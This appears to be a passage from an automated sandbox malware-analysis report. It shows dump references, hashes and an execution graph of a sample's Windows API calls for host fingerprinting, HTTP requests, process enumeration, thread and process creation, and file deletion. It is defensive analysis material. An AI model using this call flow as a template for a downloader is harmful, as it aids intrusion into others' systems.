                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandlewsprintf$CreateProcess
                          • String ID:
                          • API String ID: 2803068115-0
                          • Opcode ID: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
                          • Instruction ID: ec4c0edb961ab50d9e48040222ac13179c7c2eda0af0f08378e81dca6f1d11b9
                          • Opcode Fuzzy Hash: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
                          • Instruction Fuzzy Hash: 744100B2A0CFC295E760DB20E4503AAB762FBC8354F404035D68E43A69EF7CE559CB40

                          Execution Graph

                          Execution Coverage:30.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1025
                          Total number of Limit Nodes:11
                          execution_graph 4366 7ffb1c818f1c 4367 7ffb1c818dcf InternetOpenW 4366->4367 4368 7ffb1c818e0a 4366->4368 4367->4368 4369 7ffb1c818e0f InternetOpenUrlW 4367->4369 4370 7ffb1c818f2e InternetCloseHandle 4368->4370 4371 7ffb1c818f39 4368->4371 4369->4368 4375 7ffb1c818e4b 4369->4375 4370->4371 4372 7ffb1c818f4c 4371->4372 4373 7ffb1c818f41 InternetCloseHandle 4371->4373 4373->4372 4374 7ffb1c818e56 InternetReadFile 4374->4375 4375->4368 4375->4374 4376 7ffb1c81ad34 NtAllocateVirtualMemory 4375->4376 4377 7ffb1c81af9c 3 API calls 4375->4377 4376->4375 4377->4375 4378 7ffb1c81745c 4379 7ffb1c817473 4378->4379 4380 7ffb1c817482 RtlInitUnicodeString NtOpenFile 4379->4380 4381 7ffb1c8174eb NtClose 4380->4381 4382 7ffb1c8174e7 4380->4382 4381->4382 4383 7ffb1c8152ae 4384 7ffb1c8150c8 4383->4384 4393 7ffb1c8151fb 4383->4393 4385 7ffb1c815175 4384->4385 4386 7ffb1c8150f5 4384->4386 4388 7ffb1c8151aa HttpOpenRequestA 4385->4388 4387 7ffb1c81512a HttpOpenRequestA 4386->4387 4389 7ffb1c8151f3 4387->4389 4388->4389 4390 7ffb1c81522d 4389->4390 4391 7ffb1c81520a InternetSetOptionA 4389->4391 4389->4393 4392 7ffb1c81527f HttpSendRequestA 4390->4392 4394 7ffb1c815237 4390->4394 4391->4390 4392->4393 4395 7ffb1c815254 HttpSendRequestA 4394->4395 4395->4393 4396 7ffb1c81b670 4397 7ffb1c81b68e 4396->4397 4399 7ffb1c81b6f1 4396->4399 4398 7ffb1c81b6ba CreateFileMappingA 4397->4398 4398->4399 4400 7ffb1c81b6f8 MapViewOfFile 4398->4400 4400->4399 4402 7ffb1c81b72b 4400->4402 4401 7ffb1c81b7f7 VirtualFree 4403 7ffb1c817b40 NtFreeVirtualMemory 4401->4403 4402->4401 4404 7ffb1c81ad34 NtAllocateVirtualMemory 4402->4404 4405 7ffb1c81b828 UnmapViewOfFile CloseHandle 4403->4405 4406 7ffb1c81b761 4404->4406 4405->4399 4407 7ffb1c81b984 3 API calls 4406->4407 4408 7ffb1c81b7b3 4407->4408 4409 7ffb1c81b984 3 API calls 4408->4409 4410 7ffb1c81b7c5 4409->4410 4411 7ffb1c81bae0 NtAllocateVirtualMemory 4410->4411 4412 7ffb1c81b7db 4411->4412 4413 7ffb1c817b40 NtFreeVirtualMemory 4412->4413 4413->4401 3418 7ffb1c815750 3420 7ffb1c8157d9 3418->3420 3423 7ffb1c815846 new[] 3420->3423 3443 7ffb1c81c934 NtDelayExecution 3420->3443 3421 7ffb1c81ad34 NtAllocateVirtualMemory 3421->3423 3423->3421 3425 7ffb1c81bae0 NtAllocateVirtualMemory 3423->3425 3426 7ffb1c815d53 wsprintfA 3423->3426 3427 7ffb1c815c2e wsprintfA 3423->3427 3429 7ffb1c815b3f wsprintfA 3423->3429 3432 7ffb1c815879 3423->3432 3436 7ffb1c817b40 NtFreeVirtualMemory 3423->3436 3439 7ffb1c81610f 3423->3439 3444 7ffb1c8152c4 3423->3444 3455 7ffb1c817fa8 3423->3455 3481 7ffb1c81b984 3423->3481 3485 7ffb1c816634 3423->3485 3489 7ffb1c814d20 3423->3489 3502 7ffb1c816370 3423->3502 3506 7ffb1c81ce20 3423->3506 3512 7ffb1c81541c 3423->3512 3425->3423 3428 7ffb1c81b984 3 API calls 3426->3428 3427->3423 3428->3423 3429->3423 3436->3423 3438 7ffb1c8188a4 GetCursorPos GetTickCount RtlRandom 3438->3439 3439->3423 3439->3438 3440 7ffb1c8161b4 GetExitCodeThread 3439->3440 3441 7ffb1c8161ed GetExitCodeThread 3439->3441 3524 7ffb1c81c934 NtDelayExecution 3439->3524 3440->3439 3441->3439 3443->3420 3445 7ffb1c8152fc 3444->3445 3525 7ffb1c81ad34 NtAllocateVirtualMemory 3445->3525 3447 7ffb1c815322 3448 7ffb1c81ad34 NtAllocateVirtualMemory 3447->3448 3449 7ffb1c815338 InternetCrackUrlA 3448->3449 3450 7ffb1c8153ae 3449->3450 3451 7ffb1c815394 3449->3451 3450->3423 3527 7ffb1c817b40 3451->3527 3454 7ffb1c817b40 NtFreeVirtualMemory 3454->3450 3456 7ffb1c81ad34 NtAllocateVirtualMemory 3455->3456 3457 7ffb1c817fd6 3456->3457 3458 7ffb1c817fe3 3457->3458 3459 7ffb1c817fea GetAdaptersInfo 3457->3459 3458->3423 3460 7ffb1c818011 3459->3460 3461 7ffb1c8181df 3459->3461 3462 7ffb1c81ad34 NtAllocateVirtualMemory 3460->3462 3463 7ffb1c81820c 3461->3463 3465 7ffb1c817b40 NtFreeVirtualMemory 3461->3465 3464 7ffb1c81801c GetAdaptersInfo 3462->3464 3466 7ffb1c81ad34 NtAllocateVirtualMemory 3463->3466 3467 7ffb1c818049 3464->3467 3465->3463 3468 7ffb1c81821f 3466->3468 3472 7ffb1c81806a wsprintfA 3467->3472 3468->3458 3469 7ffb1c818230 GetComputerNameExA 3468->3469 3470 7ffb1c8182ad GetComputerNameExA 3469->3470 3474 7ffb1c818249 3469->3474 3471 7ffb1c81835f 3470->3471 3476 7ffb1c8182ca 3470->3476 3473 7ffb1c817b40 NtFreeVirtualMemory 3471->3473 3477 7ffb1c818086 3472->3477 3473->3458 3475 7ffb1c81827e wsprintfA 3474->3475 3475->3470 3478 7ffb1c81832a wsprintfA 3476->3478 3477->3461 3479 7ffb1c8181ab wsprintfA 3477->3479 3480 7ffb1c818136 wsprintfA 3477->3480 3478->3471 3479->3461 3479->3477 3480->3477 3482 7ffb1c81b99c 3481->3482 3530 7ffb1c81b9cc 3482->3530 3484 7ffb1c81b9c5 3484->3423 3486 7ffb1c816649 3485->3486 3488 7ffb1c81665a 3485->3488 3487 7ffb1c81ad34 NtAllocateVirtualMemory 3486->3487 3486->3488 3487->3488 3488->3423 3500 7ffb1c814d55 3489->3500 3490 7ffb1c8152c4 3 API calls 3490->3500 3491 7ffb1c814c70 InternetOpenW InternetConnectA 3491->3500 3492 7ffb1c817b40 NtFreeVirtualMemory 3492->3500 3493 7ffb1c814eb5 3495 7ffb1c814f2e InternetCloseHandle 3493->3495 3496 7ffb1c814f39 3493->3496 3494 7ffb1c81bae0 NtAllocateVirtualMemory 3494->3500 3495->3496 3498 7ffb1c814f4c 3496->3498 3499 7ffb1c814f41 InternetCloseHandle 3496->3499 3498->3423 3499->3498 3500->3490 3500->3491 3500->3492 3500->3493 3500->3494 3550 7ffb1c815030 3500->3550 3564 7ffb1c814f58 3500->3564 3503 7ffb1c816386 3502->3503 3504 7ffb1c81ad34 NtAllocateVirtualMemory 3503->3504 3505 7ffb1c8163a3 3503->3505 3504->3505 3505->3423 3507 7ffb1c81ce2e 3506->3507 3511 7ffb1c81ce30 3506->3511 3507->3423 3508 7ffb1c81ce7e 3510 7ffb1c817b40 NtFreeVirtualMemory 3508->3510 3509 7ffb1c817b40 NtFreeVirtualMemory 3509->3511 3510->3507 3511->3508 3511->3509 3513 7ffb1c815486 3512->3513 3569 7ffb1c81bae0 3513->3569 3515 7ffb1c8154b4 3515->3423 3516 7ffb1c81ce20 NtFreeVirtualMemory 3522 7ffb1c8154a7 3516->3522 3517 7ffb1c815738 3621 7ffb1c81d1c8 3517->3621 3520 7ffb1c817b40 NtFreeVirtualMemory 3520->3515 3522->3515 3522->3516 3522->3517 3572 7ffb1c81ccbc 3522->3572 3582 7ffb1c813cf4 3522->3582 3524->3439 3526 7ffb1c81ad74 3525->3526 3526->3447 3528 7ffb1c8153a1 3527->3528 3529 7ffb1c817b5a NtFreeVirtualMemory 3527->3529 3528->3454 3529->3528 3533 7ffb1c81b058 3530->3533 3532 7ffb1c81b9fb 3532->3484 3534 7ffb1c81b06c 3533->3534 3535 7ffb1c81b087 3533->3535 3536 7ffb1c817b40 NtFreeVirtualMemory 3534->3536 3539 7ffb1c81af9c 3535->3539 3538 7ffb1c81b079 3536->3538 3538->3532 3540 7ffb1c81afcd 3539->3540 3541 7ffb1c81afc3 3539->3541 3543 7ffb1c81ad34 NtAllocateVirtualMemory 3540->3543 3546 7ffb1c81afec 3540->3546 3547 7ffb1c81addc 3541->3547 3543->3546 3544 7ffb1c81aff9 3544->3538 3545 7ffb1c817b40 NtFreeVirtualMemory 3545->3544 3546->3544 3546->3545 3548 7ffb1c81aded 3547->3548 3549 7ffb1c81adf1 VirtualQuery 3547->3549 3548->3540 3549->3548 3551 7ffb1c81507f 3550->3551 3552 7ffb1c815175 3551->3552 3554 7ffb1c8150f5 3551->3554 3553 7ffb1c81518e HttpOpenRequestA 3552->3553 3557 7ffb1c8151f3 3553->3557 3555 7ffb1c81512a HttpOpenRequestA 3554->3555 3555->3557 3558 7ffb1c81522d 3557->3558 3559 7ffb1c81520a InternetSetOptionA 3557->3559 3561 7ffb1c8151fb 3557->3561 3560 7ffb1c81527f HttpSendRequestA 3558->3560 3562 7ffb1c815237 3558->3562 3559->3558 3560->3561 3561->3500 3563 7ffb1c815254 HttpSendRequestA 3562->3563 3563->3561 3565 7ffb1c814fa1 InternetReadFile 3564->3565 3566 7ffb1c814fe9 3565->3566 3568 7ffb1c814fc3 3565->3568 3566->3500 3567 7ffb1c81b058 3 API calls 3567->3568 3568->3565 3568->3566 3568->3567 3570 7ffb1c81ad34 NtAllocateVirtualMemory 3569->3570 3571 7ffb1c81bafc 3570->3571 3571->3522 3574 7ffb1c81ccd8 3572->3574 3573 7ffb1c81ad34 NtAllocateVirtualMemory 3576 7ffb1c81cd3f 3573->3576 3574->3573 3575 7ffb1c81cd0f 3574->3575 3575->3522 3576->3575 3577 7ffb1c81bae0 NtAllocateVirtualMemory 3576->3577 3578 7ffb1c81cd71 3577->3578 3579 7ffb1c81ad34 NtAllocateVirtualMemory 3578->3579 3580 7ffb1c81cd90 3579->3580 3580->3575 3581 7ffb1c817b40 NtFreeVirtualMemory 3580->3581 3581->3575 3620 7ffb1c813d13 3582->3620 3583 7ffb1c813fac 3585 7ffb1c813fb7 3583->3585 3586 7ffb1c81405a 3583->3586 3584 7ffb1c813ff6 3587 7ffb1c814001 3584->3587 3588 7ffb1c814092 ExitProcess 3584->3588 3590 7ffb1c813fc2 3585->3590 3591 7ffb1c8140d6 3585->3591 3592 7ffb1c816e04 21 API calls 3586->3592 3589 7ffb1c8140c2 3587->3589 3594 7ffb1c81400c 3587->3594 3737 7ffb1c814110 3589->3737 3597 7ffb1c8140ad 3590->3597 3598 7ffb1c813fcd 3590->3598 3781 7ffb1c811a08 3591->3781 3599 7ffb1c814066 3592->3599 3593 7ffb1c813ff1 3593->3522 3594->3593 3801 7ffb1c8172c8 3594->3801 3704 7ffb1c811c38 CreateToolhelp32Snapshot 3597->3704 3600 7ffb1c8140bb 3598->3600 3601 7ffb1c813fd8 3598->3601 3599->3593 3660 7ffb1c813c2c 3599->3660 3736 7ffb1c812118 CreateThread 3600->3736 3603 7ffb1c813fdf 3601->3603 3604 7ffb1c814046 3601->3604 3609 7ffb1c81409c 3603->3609 3610 7ffb1c813fea 3603->3610 3648 7ffb1c816e04 3604->3648 3689 7ffb1c816c2c 3609->3689 3610->3593 3635 7ffb1c817170 3610->3635 3618 7ffb1c816e04 21 API calls 3619 7ffb1c814088 ExitProcess 3618->3619 3620->3583 3620->3584 3622 7ffb1c81573d 3621->3622 3630 7ffb1c81d1dc new[] 3621->3630 3622->3520 3623 7ffb1c81d378 3625 7ffb1c81d38a 3623->3625 3627 7ffb1c817b40 NtFreeVirtualMemory 3623->3627 3624 7ffb1c817b40 NtFreeVirtualMemory 3624->3623 3625->3622 3628 7ffb1c817b40 NtFreeVirtualMemory 3625->3628 3626 7ffb1c81ad34 NtAllocateVirtualMemory 3626->3630 3627->3625 3628->3622 3629 7ffb1c81d26b wsprintfA 3629->3630 3630->3626 3630->3629 3632 7ffb1c81d20e 3630->3632 3633 7ffb1c816b9c 3 API calls 3630->3633 3634 7ffb1c817acc 4 API calls 3630->3634 4040 7ffb1c81cea4 3630->4040 3632->3623 3632->3624 3633->3630 3634->3630 3636 7ffb1c81718f 3635->3636 3637 7ffb1c81719c MultiByteToWideChar 3636->3637 3812 7ffb1c816f48 3637->3812 3640 7ffb1c8172ab 3641 7ffb1c817b40 NtFreeVirtualMemory 3640->3641 3647 7ffb1c8172a4 3640->3647 3641->3647 3642 7ffb1c817217 VirtualAlloc 3643 7ffb1c81724a 3642->3643 3644 7ffb1c81ad34 NtAllocateVirtualMemory 3643->3644 3645 7ffb1c817254 CreateThread 3644->3645 3646 7ffb1c817b40 NtFreeVirtualMemory 3645->3646 3646->3647 3647->3593 3876 7ffb1c817e90 3648->3876 3650 7ffb1c816e27 3658 7ffb1c816e34 3650->3658 3884 7ffb1c8188a4 3650->3884 3653 7ffb1c817b40 NtFreeVirtualMemory 3654 7ffb1c816ea3 3653->3654 3655 7ffb1c816ecb MultiByteToWideChar 3654->3655 3656 7ffb1c816f48 12 API calls 3655->3656 3657 7ffb1c816f13 3656->3657 3657->3658 3890 7ffb1c81b400 3657->3890 3658->3593 3661 7ffb1c813c4f 3660->3661 3662 7ffb1c813c42 SetEvent 3660->3662 3663 7ffb1c813c73 3661->3663 3664 7ffb1c813c59 ReleaseMutex CloseHandle 3661->3664 3662->3661 3665 7ffb1c813a24 3663->3665 3664->3663 3666 7ffb1c813a42 CreateFileW 3665->3666 3670 7ffb1c813a38 3665->3670 3667 7ffb1c813a8a 3666->3667 3666->3670 3668 7ffb1c81ad34 NtAllocateVirtualMemory 3667->3668 3669 7ffb1c813af5 3668->3669 3669->3670 3671 7ffb1c813b1b SetFileInformationByHandle 3669->3671 3680 7ffb1c813808 3670->3680 3672 7ffb1c813b7b 3671->3672 3673 7ffb1c813b67 3671->3673 3675 7ffb1c817b40 NtFreeVirtualMemory 3672->3675 3674 7ffb1c817b40 NtFreeVirtualMemory 3673->3674 3674->3670 3676 7ffb1c813b85 CloseHandle CreateFileW 3675->3676 3676->3670 3677 7ffb1c813bd5 3676->3677 3678 7ffb1c813be9 SetFileInformationByHandle 3677->3678 3678->3670 3679 7ffb1c813c14 CloseHandle 3678->3679 3679->3670 3898 7ffb1c8130d0 3680->3898 3683 7ffb1c813830 3683->3618 3686 7ffb1c816b9c 3 API calls 3687 7ffb1c813850 3686->3687 3928 7ffb1c817694 3687->3928 3690 7ffb1c816c6b 3689->3690 3691 7ffb1c817e90 4 API calls 3690->3691 3692 7ffb1c816c97 3691->3692 3693 7ffb1c8188a4 3 API calls 3692->3693 3702 7ffb1c816ca4 3692->3702 3694 7ffb1c816cee wsprintfW 3693->3694 3695 7ffb1c817b40 NtFreeVirtualMemory 3694->3695 3696 7ffb1c816d13 3695->3696 3697 7ffb1c816d38 MultiByteToWideChar 3696->3697 3698 7ffb1c816f48 12 API calls 3697->3698 3699 7ffb1c816d7d 3698->3699 3700 7ffb1c816d9d MultiByteToWideChar 3699->3700 3701 7ffb1c816dd1 3700->3701 3700->3702 3701->3702 3997 7ffb1c81b4cc 3701->3997 3702->3593 3705 7ffb1c81ad34 NtAllocateVirtualMemory 3704->3705 3706 7ffb1c811c87 3705->3706 3707 7ffb1c81b984 3 API calls 3706->3707 3708 7ffb1c811cd0 3707->3708 3709 7ffb1c811cdc Process32First 3708->3709 3710 7ffb1c8120f6 3708->3710 3711 7ffb1c811d06 Process32Next 3709->3711 3712 7ffb1c811d27 3709->3712 3713 7ffb1c81b984 3 API calls 3710->3713 3711->3711 3711->3712 3715 7ffb1c81ad34 NtAllocateVirtualMemory 3712->3715 3714 7ffb1c812107 3713->3714 3714->3593 3716 7ffb1c811d37 Process32First 3715->3716 3717 7ffb1c811da0 Process32First 3716->3717 3718 7ffb1c811d53 3716->3718 3720 7ffb1c8120e1 3717->3720 3725 7ffb1c811dbb 3717->3725 3719 7ffb1c811d5b Process32Next 3718->3719 3719->3717 3719->3719 3721 7ffb1c817b40 NtFreeVirtualMemory 3720->3721 3722 7ffb1c8120eb CloseHandle 3721->3722 3722->3710 3723 7ffb1c8120c6 Process32Next 3723->3720 3723->3725 3724 7ffb1c81b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3724->3725 3725->3723 3725->3724 3726 7ffb1c811edb wsprintfA 3725->3726 3727 7ffb1c81b984 3 API calls 3726->3727 3729 7ffb1c811f08 3727->3729 3728 7ffb1c81b984 3 API calls 3728->3729 3729->3728 3730 7ffb1c811f81 wsprintfA 3729->3730 3731 7ffb1c81b984 3 API calls 3730->3731 3734 7ffb1c811fae 3731->3734 3733 7ffb1c81b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3733->3734 3734->3733 3735 7ffb1c81b984 3 API calls 3734->3735 4006 7ffb1c8114d8 CreateToolhelp32Snapshot 3734->4006 3735->3723 3736->3593 3738 7ffb1c814150 3737->3738 3739 7ffb1c81ad34 NtAllocateVirtualMemory 3738->3739 3740 7ffb1c81417c 3739->3740 3741 7ffb1c81ad34 NtAllocateVirtualMemory 3740->3741 3742 7ffb1c81418b 3741->3742 3743 7ffb1c817e90 4 API calls 3742->3743 3745 7ffb1c81419a 3743->3745 3744 7ffb1c8141a7 3744->3593 3745->3744 3746 7ffb1c8188a4 3 API calls 3745->3746 3747 7ffb1c81423d wsprintfW 3746->3747 3748 7ffb1c814267 3747->3748 3749 7ffb1c81428e wsprintfW 3748->3749 3750 7ffb1c8142b8 3749->3750 3751 7ffb1c81bb2c NtAllocateVirtualMemory 3750->3751 3752 7ffb1c8142c4 3751->3752 3753 7ffb1c816b9c 3 API calls 3752->3753 3754 7ffb1c8142d3 3753->3754 3755 7ffb1c81b9cc 3 API calls 3754->3755 3756 7ffb1c81430c 3755->3756 3757 7ffb1c81b984 3 API calls 3756->3757 3760 7ffb1c814359 3757->3760 3759 7ffb1c817b40 NtFreeVirtualMemory 3761 7ffb1c8145f2 3759->3761 3763 7ffb1c8188a4 3 API calls 3760->3763 3772 7ffb1c814435 3760->3772 3773 7ffb1c8188a4 3 API calls 3760->3773 3779 7ffb1c81459d wsprintfW 3760->3779 4022 7ffb1c817588 3760->4022 3762 7ffb1c817b40 NtFreeVirtualMemory 3761->3762 3764 7ffb1c814605 3762->3764 3766 7ffb1c8143ab wsprintfW 3763->3766 3765 7ffb1c817b40 NtFreeVirtualMemory 3764->3765 3767 7ffb1c814618 3765->3767 3768 7ffb1c8143db 3766->3768 3769 7ffb1c817b40 NtFreeVirtualMemory 3767->3769 3770 7ffb1c8143e5 MultiByteToWideChar 3768->3770 3769->3744 3771 7ffb1c816f48 12 API calls 3770->3771 3771->3760 3772->3759 3774 7ffb1c81447a wsprintfW 3773->3774 3776 7ffb1c8144a7 3774->3776 3775 7ffb1c8144ce wsprintfW 3775->3776 3776->3775 3777 7ffb1c81450d MultiByteToWideChar 3776->3777 3778 7ffb1c816f48 12 API calls 3777->3778 3778->3760 3780 7ffb1c81b4cc 5 API calls 3779->3780 3780->3760 3782 7ffb1c81ad34 NtAllocateVirtualMemory 3781->3782 3783 7ffb1c811a1b 3782->3783 3784 7ffb1c81b984 3 API calls 3783->3784 3785 7ffb1c811a5b 3784->3785 4032 7ffb1c817f1c 3785->4032 3787 7ffb1c811bdb 3788 7ffb1c817b40 NtFreeVirtualMemory 3787->3788 3790 7ffb1c811bed 3787->3790 3788->3790 3789 7ffb1c811a6e 3789->3787 3791 7ffb1c81b984 3 API calls 3789->3791 3792 7ffb1c81b984 3 API calls 3790->3792 3793 7ffb1c811aba FindFirstFileA 3791->3793 3794 7ffb1c811c28 3792->3794 3793->3787 3798 7ffb1c811ade 3793->3798 3794->3593 3795 7ffb1c811bb5 FindNextFileA 3796 7ffb1c811bd0 FindClose 3795->3796 3795->3798 3796->3787 3797 7ffb1c81b984 3 API calls 3797->3798 3798->3795 3798->3797 3799 7ffb1c811b80 wsprintfA 3798->3799 3800 7ffb1c81b984 3 API calls 3799->3800 3800->3798 3802 7ffb1c8172e3 3801->3802 3803 7ffb1c8172f0 MultiByteToWideChar 3802->3803 3804 7ffb1c816f48 12 API calls 3803->3804 3805 7ffb1c817341 3804->3805 3806 7ffb1c81ad34 NtAllocateVirtualMemory 3805->3806 3811 7ffb1c817400 3805->3811 3807 7ffb1c817376 3806->3807 3808 7ffb1c81ad34 NtAllocateVirtualMemory 3807->3808 3809 7ffb1c817399 CreateThread 3808->3809 3810 7ffb1c817b40 NtFreeVirtualMemory 3809->3810 3810->3811 3811->3593 3822 7ffb1c816f88 3812->3822 3814 7ffb1c816fec 3815 7ffb1c81713c 3814->3815 3816 7ffb1c817b40 NtFreeVirtualMemory 3814->3816 3817 7ffb1c817b40 NtFreeVirtualMemory 3815->3817 3821 7ffb1c8170ed 3815->3821 3816->3815 3817->3821 3819 7ffb1c8170e0 3820 7ffb1c817b40 NtFreeVirtualMemory 3819->3820 3820->3821 3821->3640 3821->3642 3822->3814 3822->3819 3825 7ffb1c818d90 3822->3825 3837 7ffb1c81bb2c 3822->3837 3840 7ffb1c816b9c 3822->3840 3852 7ffb1c817acc 3822->3852 3826 7ffb1c818dcf InternetOpenW 3825->3826 3827 7ffb1c818e0f InternetOpenUrlW 3826->3827 3828 7ffb1c818e0a 3826->3828 3827->3828 3834 7ffb1c818e4b 3827->3834 3829 7ffb1c818f2e InternetCloseHandle 3828->3829 3830 7ffb1c818f39 3828->3830 3829->3830 3832 7ffb1c818f4c 3830->3832 3833 7ffb1c818f41 InternetCloseHandle 3830->3833 3831 7ffb1c818e56 InternetReadFile 3831->3834 3832->3822 3833->3832 3834->3828 3834->3831 3835 7ffb1c81ad34 NtAllocateVirtualMemory 3834->3835 3836 7ffb1c81af9c 3 API calls 3834->3836 3835->3834 3836->3834 3838 7ffb1c81ad34 NtAllocateVirtualMemory 3837->3838 3839 7ffb1c81bb54 3838->3839 3839->3822 3858 7ffb1c818fe8 3840->3858 3845 7ffb1c816c12 3846 7ffb1c816bbf 3845->3846 3849 7ffb1c817b40 NtFreeVirtualMemory 3845->3849 3846->3822 3847 7ffb1c81ba98 3 API calls 3848 7ffb1c816bed 3847->3848 3848->3845 3850 7ffb1c816bf1 3848->3850 3849->3846 3851 7ffb1c817b40 NtFreeVirtualMemory 3850->3851 3851->3846 3870 7ffb1c8177b0 3852->3870 3855 7ffb1c817b0b 3855->3822 3859 7ffb1c81bb2c NtAllocateVirtualMemory 3858->3859 3861 7ffb1c819008 3859->3861 3860 7ffb1c816bbb 3860->3846 3863 7ffb1c81ba98 3860->3863 3861->3860 3862 7ffb1c817b40 NtFreeVirtualMemory 3861->3862 3862->3860 3864 7ffb1c81bab0 3863->3864 3867 7ffb1c81ba2c 3864->3867 3866 7ffb1c816bd7 3866->3845 3866->3847 3868 7ffb1c81b058 3 API calls 3867->3868 3869 7ffb1c81ba60 3868->3869 3869->3866 3871 7ffb1c8177f1 3870->3871 3872 7ffb1c817803 RtlInitUnicodeString NtCreateFile 3871->3872 3873 7ffb1c8178a9 3872->3873 3873->3855 3874 7ffb1c817a54 NtWriteFile 3873->3874 3875 7ffb1c817abc NtClose 3874->3875 3875->3855 3895 7ffb1c81ae1c 3876->3895 3879 7ffb1c817ed3 3880 7ffb1c81bb2c NtAllocateVirtualMemory 3879->3880 3882 7ffb1c817edf 3880->3882 3881 7ffb1c817eec 3881->3650 3882->3881 3883 7ffb1c81ba98 3 API calls 3882->3883 3883->3881 3885 7ffb1c81ae1c 3884->3885 3886 7ffb1c8188b7 GetCursorPos 3885->3886 3887 7ffb1c816e7e wsprintfW 3886->3887 3888 7ffb1c8188ca GetTickCount 3886->3888 3887->3653 3897 7ffb1c81af74 RtlRandom 3888->3897 3891 7ffb1c81b41a 3890->3891 3892 7ffb1c81b452 CreateProcessW 3891->3892 3893 7ffb1c81b4a2 3892->3893 3894 7ffb1c81b4a6 CloseHandle CloseHandle 3892->3894 3893->3658 3894->3893 3896 7ffb1c817eaa SHGetFolderPathW 3895->3896 3896->3879 3897->3887 3932 7ffb1c8189d4 3898->3932 3904 7ffb1c817b40 NtFreeVirtualMemory 3905 7ffb1c81316c 3904->3905 3906 7ffb1c81310b 3905->3906 3908 7ffb1c817b40 NtFreeVirtualMemory 3905->3908 3906->3683 3911 7ffb1c813250 3906->3911 3907 7ffb1c813116 3909 7ffb1c81ba98 3 API calls 3907->3909 3910 7ffb1c81315e 3907->3910 3908->3906 3909->3910 3910->3904 3912 7ffb1c8189d4 3 API calls 3911->3912 3913 7ffb1c813276 3912->3913 3914 7ffb1c813194 2 API calls 3913->3914 3915 7ffb1c81327e 3914->3915 3916 7ffb1c8130d0 12 API calls 3915->3916 3924 7ffb1c81328b 3915->3924 3917 7ffb1c813318 3916->3917 3919 7ffb1c81ba98 3 API calls 3917->3919 3927 7ffb1c81335c 3917->3927 3918 7ffb1c817b40 NtFreeVirtualMemory 3920 7ffb1c813384 3918->3920 3921 7ffb1c813336 3919->3921 3922 7ffb1c817b40 NtFreeVirtualMemory 3920->3922 3920->3924 3923 7ffb1c81ba98 3 API calls 3921->3923 3921->3927 3922->3924 3925 7ffb1c813349 3923->3925 3924->3683 3924->3686 3926 7ffb1c81ba98 3 API calls 3925->3926 3925->3927 3926->3927 3927->3918 3929 7ffb1c81ae1c 3928->3929 3930 7ffb1c8176b4 RtlInitUnicodeString NtDeleteFile 3929->3930 3931 7ffb1c8176f0 3930->3931 3931->3683 3933 7ffb1c8189f2 3932->3933 3934 7ffb1c818a04 FindFirstVolumeW 3933->3934 3935 7ffb1c818a25 GetVolumeInformationW FindVolumeClose 3934->3935 3936 7ffb1c8130f6 3934->3936 3935->3936 3937 7ffb1c813194 3936->3937 3938 7ffb1c8131d6 3937->3938 3939 7ffb1c813215 wsprintfW 3938->3939 3940 7ffb1c813235 3939->3940 3942 7ffb1c8130fe 3939->3942 3941 7ffb1c81bb2c NtAllocateVirtualMemory 3940->3941 3941->3942 3942->3906 3943 7ffb1c817b98 3942->3943 3944 7ffb1c817bb5 3943->3944 3950 7ffb1c817bbf 3944->3950 3951 7ffb1c81b154 3944->3951 3946 7ffb1c817e42 3947 7ffb1c81ba98 3 API calls 3946->3947 3946->3950 3948 7ffb1c817e65 3947->3948 3949 7ffb1c817b40 NtFreeVirtualMemory 3948->3949 3948->3950 3949->3950 3950->3907 3960 7ffb1c8188f8 3951->3960 3954 7ffb1c81b192 3954->3946 3955 7ffb1c81ba98 3 API calls 3956 7ffb1c81b1a5 3955->3956 3957 7ffb1c81b1bd 3956->3957 3972 7ffb1c81b1d4 3956->3972 3959 7ffb1c817b40 NtFreeVirtualMemory 3957->3959 3959->3954 3961 7ffb1c81895b 3960->3961 3963 7ffb1c818916 3960->3963 3962 7ffb1c81896a RtlFormatCurrentUserKeyPath 3961->3962 3964 7ffb1c818979 3962->3964 3966 7ffb1c818951 3962->3966 3967 7ffb1c81ba98 3 API calls 3963->3967 3965 7ffb1c81ba98 3 API calls 3964->3965 3965->3966 3968 7ffb1c81ba98 3 API calls 3966->3968 3971 7ffb1c818955 3966->3971 3967->3966 3969 7ffb1c8189af 3968->3969 3970 7ffb1c817b40 NtFreeVirtualMemory 3969->3970 3969->3971 3970->3971 3971->3954 3971->3955 3988 7ffb1c81bf4c 3972->3988 3975 7ffb1c81b20d 3975->3957 3977 7ffb1c81b22c 3977->3975 3978 7ffb1c81b246 NtQueryValueKey 3977->3978 3978->3975 3979 7ffb1c81b27e 3978->3979 3980 7ffb1c81ad34 NtAllocateVirtualMemory 3979->3980 3981 7ffb1c81b289 3980->3981 3982 7ffb1c81b32f NtClose 3981->3982 3983 7ffb1c81b29a NtQueryValueKey 3981->3983 3982->3975 3984 7ffb1c81b2cb 3983->3984 3985 7ffb1c81b2df 3983->3985 3987 7ffb1c81ad34 NtAllocateVirtualMemory 3984->3987 3986 7ffb1c817b40 NtFreeVirtualMemory 3985->3986 3986->3982 3987->3985 3989 7ffb1c81bf66 3988->3989 3991 7ffb1c81b209 3988->3991 3990 7ffb1c81bb2c NtAllocateVirtualMemory 3989->3990 3990->3991 3991->3975 3992 7ffb1c81b0c4 3991->3992 3993 7ffb1c81bf4c NtAllocateVirtualMemory 3992->3993 3994 7ffb1c81b0f1 3993->3994 3995 7ffb1c81b108 RtlpNtOpenKey 3994->3995 3996 7ffb1c81b0f5 3994->3996 3995->3996 3996->3977 3998 7ffb1c81b4ec 3997->3998 3999 7ffb1c81b54a 3998->3999 4000 7ffb1c81b5a4 3998->4000 4001 7ffb1c81b57f wsprintfW 